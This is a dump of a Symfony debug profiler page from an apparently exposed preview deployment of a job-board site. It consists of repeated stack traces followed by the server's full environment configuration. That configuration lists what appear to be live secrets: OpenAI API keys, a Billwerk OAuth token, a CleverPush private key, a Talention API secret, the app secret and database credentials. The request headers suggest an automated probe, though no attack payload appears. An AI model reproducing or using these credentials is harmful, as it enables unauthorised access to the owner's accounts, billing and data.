    "file" => "/workspace/backend-app/vendor/symfony/http-kernel/HttpKernel.php"
    "line" => 86
    "function" => "handleThrowable"
    "class" => "Symfony\Component\HttpKernel\HttpKernel"
    "type" => "->"
  ]
  [
    "file" => "/workspace/backend-app/vendor/symfony/http-kernel/Kernel.php"
    "line" => 202
    "function" => "handle"
    "class" => "Symfony\Component\HttpKernel\HttpKernel"
    "type" => "->"
  ]
  [
    "file" => "/workspace/backend-app/vendor/symfony/http-kernel/HttpCache/SubRequestHandler.php"
    "line" => 86
    "function" => "handle"
    "class" => "Symfony\Component\HttpKernel\Kernel"
    "type" => "->"
  ]
  [
    "file" => "/workspace/backend-app/vendor/symfony/http-kernel/HttpCache/HttpCache.php"
    "line" => 482
    "function" => "handle"
    "class" => "Symfony\Component\HttpKernel\HttpCache\SubRequestHandler"
    "type" => "::"
  ]
  [
    "file" => "/workspace/backend-app/vendor/symfony/framework-bundle/HttpCache/HttpCache.php"
    "line" => 73
    "function" => "forward"
    "class" => "Symfony\Component\HttpKernel\HttpCache\HttpCache"
    "type" => "->"
  ]
  [
    "file" => "/workspace/backend-app/vendor/symfony/http-kernel/HttpCache/HttpCache.php"
    "line" => 272
    "function" => "forward"
    "class" => "Symfony\Bundle\FrameworkBundle\HttpCache\HttpCache"
    "type" => "->"
  ]
  [
    "file" => "/workspace/backend-app/vendor/symfony/http-kernel/HttpCache/HttpCache.php"
    "line" => 288
    "function" => "pass"
    "class" => "Symfony\Component\HttpKernel\HttpCache\HttpCache"
    "type" => "->"
  ]
  [
    "file" => "/workspace/backend-app/vendor/symfony/http-kernel/HttpCache/HttpCache.php"
    "line" => 216
    "function" => "invalidate"
    "class" => "Symfony\Component\HttpKernel\HttpCache\HttpCache"
    "type" => "->"
  ]
  [
    "file" => "/workspace/backend-app/public/index.php"
    "line" => 59
    "function" => "handle"
    "class" => "Symfony\Component\HttpKernel\HttpCache\HttpCache"
    "type" => "->"
  ]
  [
    "file" => "/workspace/.productbuilding/preview/router.php"
    "line" => 18
    "args" => [
      "/workspace/backend-app/public/index.php"
    ]
    "function" => "require"
  ]
]
Symfony\Component\HttpKernel\DataCollector\RequestDataCollector:75
[
  [
    "file" => "/workspace/backend-app/vendor/symfony/http-kernel/DataCollector/RequestDataCollector.php"
    "line" => 75
    "function" => "all"
    "class" => "Symfony\Component\HttpFoundation\Session\Session"
    "type" => "->"
  ]
  [
    "file" => "/workspace/backend-app/vendor/symfony/http-kernel/Profiler/Profiler.php"
    "line" => 161
    "function" => "collect"
    "class" => "Symfony\Component\HttpKernel\DataCollector\RequestDataCollector"
    "type" => "->"
  ]
  [
    "file" => "/workspace/backend-app/vendor/symfony/http-kernel/EventListener/ProfilerListener.php"
    "line" => 108
    "function" => "collect"
    "class" => "Symfony\Component\HttpKernel\Profiler\Profiler"
    "type" => "->"
  ]
  [
    "file" => "/workspace/backend-app/vendor/symfony/event-dispatcher/Debug/WrappedListener.php"
    "line" => 118
    "function" => "onKernelResponse"
    "class" => "Symfony\Component\HttpKernel\EventListener\ProfilerListener"
    "type" => "->"
  ]
  [
    "file" => "/workspace/backend-app/vendor/symfony/event-dispatcher/EventDispatcher.php"
    "line" => 230
    "function" => "__invoke"
    "class" => "Symfony\Component\EventDispatcher\Debug\WrappedListener"
    "type" => "->"
  ]
  [
    "file" => "/workspace/backend-app/vendor/symfony/event-dispatcher/EventDispatcher.php"
    "line" => 59
    "function" => "callListeners"
    "class" => "Symfony\Component\EventDispatcher\EventDispatcher"
    "type" => "->"
  ]
  [
    "file" => "/workspace/backend-app/vendor/symfony/event-dispatcher/Debug/TraceableEventDispatcher.php"
    "line" => 154
    "function" => "dispatch"
    "class" => "Symfony\Component\EventDispatcher\EventDispatcher"
    "type" => "->"
  ]
  [
    "file" => "/workspace/backend-app/vendor/symfony/http-kernel/HttpKernel.php"
    "line" => 196
    "function" => "dispatch"
    "class" => "Symfony\Component\EventDispatcher\Debug\TraceableEventDispatcher"
    "type" => "->"
  ]
  [
    "file" => "/workspace/backend-app/vendor/symfony/http-kernel/HttpKernel.php"
    "line" => 184
    "function" => "filterResponse"
    "class" => "Symfony\Component\HttpKernel\HttpKernel"
    "type" => "->"
  ]
  [
    "file" => "/workspace/backend-app/vendor/symfony/http-kernel/HttpKernel.php"
    "line" => 75
    "function" => "handleRaw"
    "class" => "Symfony\Component\HttpKernel\HttpKernel"
    "type" => "->"
  ]
  [
    "file" => "/workspace/backend-app/vendor/symfony/http-kernel/EventListener/ErrorListener.php"
    "line" => 91
    "function" => "handle"
    "class" => "Symfony\Component\HttpKernel\HttpKernel"
    "type" => "->"
  ]
  [
    "file" => "/workspace/backend-app/vendor/symfony/event-dispatcher/Debug/WrappedListener.php"
    "line" => 118
    "function" => "onKernelException"
    "class" => "Symfony\Component\HttpKernel\EventListener\ErrorListener"
    "type" => "->"
  ]
  [
    "file" => "/workspace/backend-app/vendor/symfony/event-dispatcher/EventDispatcher.php"
    "line" => 230
    "function" => "__invoke"
    "class" => "Symfony\Component\EventDispatcher\Debug\WrappedListener"
    "type" => "->"
  ]
  [
    "file" => "/workspace/backend-app/vendor/symfony/event-dispatcher/EventDispatcher.php"
    "line" => 59
    "function" => "callListeners"
    "class" => "Symfony\Component\EventDispatcher\EventDispatcher"
    "type" => "->"
  ]
  [
    "file" => "/workspace/backend-app/vendor/symfony/event-dispatcher/Debug/TraceableEventDispatcher.php"
    "line" => 154
    "function" => "dispatch"
    "class" => "Symfony\Component\EventDispatcher\EventDispatcher"
    "type" => "->"
  ]
  [
    "file" => "/workspace/backend-app/vendor/symfony/http-kernel/HttpKernel.php"
    "line" => 223
    "function" => "dispatch"
    "class" => "Symfony\Component\EventDispatcher\Debug\TraceableEventDispatcher"
    "type" => "->"
  ]
  [
    "file" => "/workspace/backend-app/vendor/symfony/http-kernel/HttpKernel.php"
    "line" => 86
    "function" => "handleThrowable"
    "class" => "Symfony\Component\HttpKernel\HttpKernel"
    "type" => "->"
  ]
  [
    "file" => "/workspace/backend-app/vendor/symfony/http-kernel/Kernel.php"
    "line" => 202
    "function" => "handle"
    "class" => "Symfony\Component\HttpKernel\HttpKernel"
    "type" => "->"
  ]
  [
    "file" => "/workspace/backend-app/vendor/symfony/http-kernel/HttpCache/SubRequestHandler.php"
    "line" => 86
    "function" => "handle"
    "class" => "Symfony\Component\HttpKernel\Kernel"
    "type" => "->"
  ]
  [
    "file" => "/workspace/backend-app/vendor/symfony/http-kernel/HttpCache/HttpCache.php"
    "line" => 482
    "function" => "handle"
    "class" => "Symfony\Component\HttpKernel\HttpCache\SubRequestHandler"
    "type" => "::"
  ]
  [
    "file" => "/workspace/backend-app/vendor/symfony/framework-bundle/HttpCache/HttpCache.php"
    "line" => 73
    "function" => "forward"
    "class" => "Symfony\Component\HttpKernel\HttpCache\HttpCache"
    "type" => "->"
  ]
  [
    "file" => "/workspace/backend-app/vendor/symfony/http-kernel/HttpCache/HttpCache.php"
    "line" => 272
    "function" => "forward"
    "class" => "Symfony\Bundle\FrameworkBundle\HttpCache\HttpCache"
    "type" => "->"
  ]
  [
    "file" => "/workspace/backend-app/vendor/symfony/http-kernel/HttpCache/HttpCache.php"
    "line" => 288
    "function" => "pass"
    "class" => "Symfony\Component\HttpKernel\HttpCache\HttpCache"
    "type" => "->"
  ]
  [
    "file" => "/workspace/backend-app/vendor/symfony/http-kernel/HttpCache/HttpCache.php"
    "line" => 216
    "function" => "invalidate"
    "class" => "Symfony\Component\HttpKernel\HttpCache\HttpCache"
    "type" => "->"
  ]
  [
    "file" => "/workspace/backend-app/public/index.php"
    "line" => 59
    "function" => "handle"
    "class" => "Symfony\Component\HttpKernel\HttpCache\HttpCache"
    "type" => "->"
  ]
  [
    "file" => "/workspace/.productbuilding/preview/router.php"
    "line" => 18
    "args" => [
      "/workspace/backend-app/public/index.php"
    ]
    "function" => "require"
  ]
]
Symfony\Component\HttpKernel\DataCollector\RequestDataCollector:76
[
  [
    "file" => "/workspace/backend-app/vendor/symfony/http-kernel/DataCollector/RequestDataCollector.php"
    "line" => 76
    "function" => "getFlashBag"
    "class" => "Symfony\Component\HttpFoundation\Session\Session"
    "type" => "->"
  ]
  [
    "file" => "/workspace/backend-app/vendor/symfony/http-kernel/Profiler/Profiler.php"
    "line" => 161
    "function" => "collect"
    "class" => "Symfony\Component\HttpKernel\DataCollector\RequestDataCollector"
    "type" => "->"
  ]
  [
    "file" => "/workspace/backend-app/vendor/symfony/http-kernel/EventListener/ProfilerListener.php"
    "line" => 108
    "function" => "collect"
    "class" => "Symfony\Component\HttpKernel\Profiler\Profiler"
    "type" => "->"
  ]
  [
    "file" => "/workspace/backend-app/vendor/symfony/event-dispatcher/Debug/WrappedListener.php"
    "line" => 118
    "function" => "onKernelResponse"
    "class" => "Symfony\Component\HttpKernel\EventListener\ProfilerListener"
    "type" => "->"
  ]
  [
    "file" => "/workspace/backend-app/vendor/symfony/event-dispatcher/EventDispatcher.php"
    "line" => 230
    "function" => "__invoke"
    "class" => "Symfony\Component\EventDispatcher\Debug\WrappedListener"
    "type" => "->"
  ]
  [
    "file" => "/workspace/backend-app/vendor/symfony/event-dispatcher/EventDispatcher.php"
    "line" => 59
    "function" => "callListeners"
    "class" => "Symfony\Component\EventDispatcher\EventDispatcher"
    "type" => "->"
  ]
  [
    "file" => "/workspace/backend-app/vendor/symfony/event-dispatcher/Debug/TraceableEventDispatcher.php"
    "line" => 154
    "function" => "dispatch"
    "class" => "Symfony\Component\EventDispatcher\EventDispatcher"
    "type" => "->"
  ]
  [
    "file" => "/workspace/backend-app/vendor/symfony/http-kernel/HttpKernel.php"
    "line" => 196
    "function" => "dispatch"
    "class" => "Symfony\Component\EventDispatcher\Debug\TraceableEventDispatcher"
    "type" => "->"
  ]
  [
    "file" => "/workspace/backend-app/vendor/symfony/http-kernel/HttpKernel.php"
    "line" => 184
    "function" => "filterResponse"
    "class" => "Symfony\Component\HttpKernel\HttpKernel"
    "type" => "->"
  ]
  [
    "file" => "/workspace/backend-app/vendor/symfony/http-kernel/HttpKernel.php"
    "line" => 75
    "function" => "handleRaw"
    "class" => "Symfony\Component\HttpKernel\HttpKernel"
    "type" => "->"
  ]
  [
    "file" => "/workspace/backend-app/vendor/symfony/http-kernel/EventListener/ErrorListener.php"
    "line" => 91
    "function" => "handle"
    "class" => "Symfony\Component\HttpKernel\HttpKernel"
    "type" => "->"
  ]
  [
    "file" => "/workspace/backend-app/vendor/symfony/event-dispatcher/Debug/WrappedListener.php"
    "line" => 118
    "function" => "onKernelException"
    "class" => "Symfony\Component\HttpKernel\EventListener\ErrorListener"
    "type" => "->"
  ]
  [
    "file" => "/workspace/backend-app/vendor/symfony/event-dispatcher/EventDispatcher.php"
    "line" => 230
    "function" => "__invoke"
    "class" => "Symfony\Component\EventDispatcher\Debug\WrappedListener"
    "type" => "->"
  ]
  [
    "file" => "/workspace/backend-app/vendor/symfony/event-dispatcher/EventDispatcher.php"
    "line" => 59
    "function" => "callListeners"
    "class" => "Symfony\Component\EventDispatcher\EventDispatcher"
    "type" => "->"
  ]
  [
    "file" => "/workspace/backend-app/vendor/symfony/event-dispatcher/Debug/TraceableEventDispatcher.php"
    "line" => 154
    "function" => "dispatch"
    "class" => "Symfony\Component\EventDispatcher\EventDispatcher"
    "type" => "->"
  ]
  [
    "file" => "/workspace/backend-app/vendor/symfony/http-kernel/HttpKernel.php"
    "line" => 223
    "function" => "dispatch"
    "class" => "Symfony\Component\EventDispatcher\Debug\TraceableEventDispatcher"
    "type" => "->"
  ]
  [
    "file" => "/workspace/backend-app/vendor/symfony/http-kernel/HttpKernel.php"
    "line" => 86
    "function" => "handleThrowable"
    "class" => "Symfony\Component\HttpKernel\HttpKernel"
    "type" => "->"
  ]
  [
    "file" => "/workspace/backend-app/vendor/symfony/http-kernel/Kernel.php"
    "line" => 202
    "function" => "handle"
    "class" => "Symfony\Component\HttpKernel\HttpKernel"
    "type" => "->"
  ]
  [
    "file" => "/workspace/backend-app/vendor/symfony/http-kernel/HttpCache/SubRequestHandler.php"
    "line" => 86
    "function" => "handle"
    "class" => "Symfony\Component\HttpKernel\Kernel"
    "type" => "->"
  ]
  [
    "file" => "/workspace/backend-app/vendor/symfony/http-kernel/HttpCache/HttpCache.php"
    "line" => 482
    "function" => "handle"
    "class" => "Symfony\Component\HttpKernel\HttpCache\SubRequestHandler"
    "type" => "::"
  ]
  [
    "file" => "/workspace/backend-app/vendor/symfony/framework-bundle/HttpCache/HttpCache.php"
    "line" => 73
    "function" => "forward"
    "class" => "Symfony\Component\HttpKernel\HttpCache\HttpCache"
    "type" => "->"
  ]
  [
    "file" => "/workspace/backend-app/vendor/symfony/http-kernel/HttpCache/HttpCache.php"
    "line" => 272
    "function" => "forward"
    "class" => "Symfony\Bundle\FrameworkBundle\HttpCache\HttpCache"
    "type" => "->"
  ]
  [
    "file" => "/workspace/backend-app/vendor/symfony/http-kernel/HttpCache/HttpCache.php"
    "line" => 288
    "function" => "pass"
    "class" => "Symfony\Component\HttpKernel\HttpCache\HttpCache"
    "type" => "->"
  ]
  [
    "file" => "/workspace/backend-app/vendor/symfony/http-kernel/HttpCache/HttpCache.php"
    "line" => 216
    "function" => "invalidate"
    "class" => "Symfony\Component\HttpKernel\HttpCache\HttpCache"
    "type" => "->"
  ]
  [
    "file" => "/workspace/backend-app/public/index.php"
    "line" => 59
    "function" => "handle"
    "class" => "Symfony\Component\HttpKernel\HttpCache\HttpCache"
    "type" => "->"
  ]
  [
    "file" => "/workspace/.productbuilding/preview/router.php"
    "line" => 18
    "args" => [
      "/workspace/backend-app/public/index.php"
    ]
    "function" => "require"
  ]
]

Flashes

Flashes

No flash messages were created.

Server Parameters

Server Parameters

Defined in .env

Key Value
APP_ENV
"dev"
APP_SECRET
"7061fb8b81a634a5d2f0e65f6f8f1901"
AWS_S3_BUCKET_NAME
"go-gastro"
AWS_S3_REGION
"eu-central-1"
BASE_TARGET_URI
"https://website-pr-25.productbuilder.joboo.de"
BILLWERK_API_BASE_URI
"https://sandbox.billwerk.com/api/v1/"
BILLWERK_BEARERS
"{"Debit":"Debit:FakePSP","CreditCard":"CreditCard:Reepay","PayPal":"PayPal:Reepay"}"
BILLWERK_HOSTNAME
"selfservice.sandbox.billwerk.com"
BILLWERK_LIMITED_BEARERS
"{"Debit":"Debit:FakePSP","CreditCard":"CreditCard:Reepay","PayPal":"PayPal:Reepay","InvoicePayment":"InvoicePayment"}"
BILLWERK_OAUTH_TOKEN
"Gz2xWq-WpScuI-L-kZ_FgxFFE-VCX243TL0Caw2EVla9Hny3Ro3yx1D-oAZxabUWvrCFF0q-53FOBuQSlZsFWA=="
BILLWERK_PUBLIC_API_KEY
"5a78192981b1f0096cd44d79"
CLEVERPUSH_PRIVATE_KEY
"CyXr6PPmXkQeK3DHP9CADXekza7Jkdek"
CLOUD_MAILIN_ATTACHMENTS_S3_URL_PREFIX
"http://go-gastro-%kernel.environment%.s3.amazonaws.com/conversation_message_attachment_files/"
CLOUD_MAILIN_MAIL_DOMAIN
"cloudmailin.net"
CLOUD_MAILIN_MAIL_ID
"4d169a4bd14ada158f11"
DATABASE_DB
"go_gastro_website_dev"
DATABASE_HOST
"website-db"
DATABASE_PASSWORD
"root"
DATABASE_PORT
"3306"
DATABASE_PRODUCT
"mysql"
DATABASE_SERVERVERSION
"10.6.23-MariaDB-1:10.6.23+maria~ubu2004"
DATABASE_URL
"mysql://root:root@website-db:3306/go_gastro_website_dev?serverVersion=10.6.23-MariaDB-1:10.6.23+maria~ubu2004"
DATABASE_USER
"root"
DIGITAL_ESTATE_URL_CONTENT
"https://content-preview.webflow.io"
DIGITAL_ESTATE_URL_PRO
"https://pro-preview.webflow.io"
ELASTICSEARCH_INDEX_NAME_SUFFIX
""
ELASTICSEARCH_URL
"http://website-es:9200/"
GOOGLE_API_KEY
""
GOOGLE_CLIENT_ID
""
GOOGLE_CLIENT_SECRET
""
MAILER_DSN
""
MAILER_URL
"null://127.0.0.1"
MAKE_ALL_JOBOFFERERS_HAVE_BASIC_MEMBERSHIP
"false"
MAKE_ALL_JOBOFFERERS_HAVE_FLEX_MEMBERSHIP
"false"
MAKE_ALL_JOBOFFERERS_HAVE_MULTI_LOCATIONS_MEMBERSHIP
"false"
MAKE_ALL_JOBOFFERERS_HAVE_PREMIUM_MEMBERSHIP
"false"
MESSENGER_IMMEDIATE_EXTERNAL_PARTNER_IMPORTS_TRANSPORT_DSN
"doctrine://default"
MESSENGER_IMMEDIATE_HIGH_VOLUME_PROCESSES_TRANSPORT_DSN
"doctrine://default"
MESSENGER_IMMEDIATE_JOBRADAR_TRANSPORT_DSN
"doctrine://default"
MESSENGER_IMMEDIATE_JOB_PROFESSION_CATEGORIZATION_TRANSPORT_DSN
"doctrine://default"
MESSENGER_IMMEDIATE_RECURRENT_JOB_PROLONGATION_TRANSPORT_DSN
"doctrine://default"
MESSENGER_IMMEDIATE_SEARCHSYNC_TRANSPORT_DSN
"doctrine://default"
MESSENGER_IMMEDIATE_TIMECRITICAL_TRANSPORT_DSN
"doctrine://default"
MESSENGER_IMMEDIATE_TRANSPORT_DSN
"doctrine://default"
MESSENGER_SCHEDULED_TRANSPORT_DSN
"doctrine://default"
OPENAI_API_KEY
"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"
OPENAI_API_KEY_JOB_CATEGORY_PERSOMATCH
"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"
REDIS_DEFAULT_HOST
""
REDIS_DEFAULT_PORT
""
ROUTER_REQUEST_CONTEXT_BASE_URL
""
ROUTER_REQUEST_CONTEXT_HOST
"website-pr-25.productbuilder.joboo.de"
ROUTER_REQUEST_CONTEXT_SCHEME
"https"
TALENTION_API_CLIENT_ID
"01e14c6a2c6d4d4e851a361e1a49221f"
TALENTION_API_SECRET
"1ff68679f67f4cf0a283897c86f72c4e"
TALENTION_API_TENANT_ID
"6345213"
WEBSITE_COMMIT_ID
""
WKHTMLTOIMAGE_PATH
"/usr/local/bin/wkhtmltoimage"
WKHTMLTOPDF_PATH
"/usr/local/bin/wkhtmltopdf"

Defined as regular env variables

Key Value
APP_DEBUG
"1"
CONTENT_LENGTH
"643"
CONTENT_TYPE
"multipart/form-data; boundary=013a9439b5f2aa31b805679d560f021a515bad1182d5b6a9cbcf85a18dfd"
DOCUMENT_ROOT
"/workspace/backend-app/public"
HTTP_ACCEPT
"text/x-component"
HTTP_ACCEPT_ENCODING
"gzip"
HTTP_ACCEPT_LANGUAGE
"en-US,en;q=0.9"
HTTP_CONTENT_LENGTH
"643"
HTTP_CONTENT_TYPE
"multipart/form-data; boundary=013a9439b5f2aa31b805679d560f021a515bad1182d5b6a9cbcf85a18dfd"
HTTP_FORWARDED
"for="172.18.0.2";host="website-pr-25.productbuilder.joboo.de";proto=http"
HTTP_HOST
"website-pr-25.productbuilder.joboo.de"
HTTP_NEXT_ACTION
"x"
HTTP_ORIGIN
"https://website-pr-25.productbuilder.joboo.de"
HTTP_REFERER
"https://website-pr-25.productbuilder.joboo.de"
HTTP_USER_AGENT
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
HTTP_X_FORWARDED_FOR
"172.18.0.2"
HTTP_X_FORWARDED_SERVER
"793078a63ff3"
HTTP_X_REAL_IP
"85.11.167.19"
PHP_SELF
"/index.php"
REMOTE_ADDR
"127.0.0.1"
REMOTE_PORT
"44994"
REQUEST_METHOD
"GET"
REQUEST_TIME
1775668182
REQUEST_TIME_FLOAT
1775668182.8422
REQUEST_URI
"/"
SCRIPT_FILENAME
"/workspace/backend-app/public/index.php"
SCRIPT_NAME
"/index.php"
SERVER_NAME
"0.0.0.0"
SERVER_PORT
"8000"
SERVER_PROTOCOL
"HTTP/1.1"
SERVER_SOFTWARE
"PHP/8.4.7 (Development Server)"
SESSION_COOKIE_DOMAIN
".joboo.de"
SYMFONY_DOTENV_VARS
"APP_ENV,APP_SECRET,MAILER_DSN,DATABASE_PRODUCT,DATABASE_USER,DATABASE_PASSWORD,DATABASE_HOST,DATABASE_PORT,DATABASE_DB,ELASTICSEARCH_URL,ELASTICSEARCH_INDEX_NAME_SUFFIX,MAILER_URL,BASE_TARGET_URI,ROUTER_REQUEST_CONTEXT_HOST,ROUTER_REQUEST_CONTEXT_SCHEME,ROUTER_REQUEST_CONTEXT_BASE_URL,WEBSITE_COMMIT_ID,AWS_S3_REGION,AWS_S3_BUCKET_NAME,BILLWERK_HOSTNAME,BILLWERK_API_BASE_URI,BILLWERK_PUBLIC_API_KEY,BILLWERK_BEARERS,BILLWERK_LIMITED_BEARERS,BILLWERK_OAUTH_TOKEN,CLOUD_MAILIN_MAIL_ID,CLOUD_MAILIN_MAIL_DOMAIN,CLOUD_MAILIN_ATTACHMENTS_S3_URL_PREFIX,CLEVERPUSH_PRIVATE_KEY,REDIS_DEFAULT_HOST,REDIS_DEFAULT_PORT,GOOGLE_API_KEY,GOOGLE_CLIENT_ID,GOOGLE_CLIENT_SECRET,WKHTMLTOPDF_PATH,WKHTMLTOIMAGE_PATH,MAKE_ALL_JOBOFFERERS_HAVE_BASIC_MEMBERSHIP,MAKE_ALL_JOBOFFERERS_HAVE_MULTI_LOCATIONS_MEMBERSHIP,MAKE_ALL_JOBOFFERERS_HAVE_PREMIUM_MEMBERSHIP,MAKE_ALL_JOBOFFERERS_HAVE_FLEX_MEMBERSHIP,MESSENGER_IMMEDIATE_TRANSPORT_DSN,MESSENGER_IMMEDIATE_TIMECRITICAL_TRANSPORT_DSN,MESSENGER_IMMEDIATE_RECURRENT_JOB_PROLONGATION_TRANSPORT_DSN,MESSENGER_IMMEDIATE_SEARCHSYNC_TRANSPORT_DSN,MESSENGER_IMMEDIATE_JOBRADAR_TRANSPORT_DSN,MESSENGER_IMMEDIATE_EXTERNAL_PARTNER_IMPORTS_TRANSPORT_DSN,MESSENGER_IMMEDIATE_HIGH_VOLUME_PROCESSES_TRANSPORT_DSN,MESSENGER_IMMEDIATE_JOB_PROFESSION_CATEGORIZATION_TRANSPORT_DSN,MESSENGER_SCHEDULED_TRANSPORT_DSN,DIGITAL_ESTATE_URL_CONTENT,DIGITAL_ESTATE_URL_PRO,OPENAI_API_KEY,TALENTION_API_CLIENT_ID,TALENTION_API_TENANT_ID,TALENTION_API_SECRET,DATABASE_SERVERVERSION,DATABASE_URL,OPENAI_API_KEY_JOB_CATEGORY_PERSOMATCH"

Parent Request

Return to parent request (token = cbf95b)

Key Value
_remove_csp_headers
true
_stopwatch_token
"ff7af9"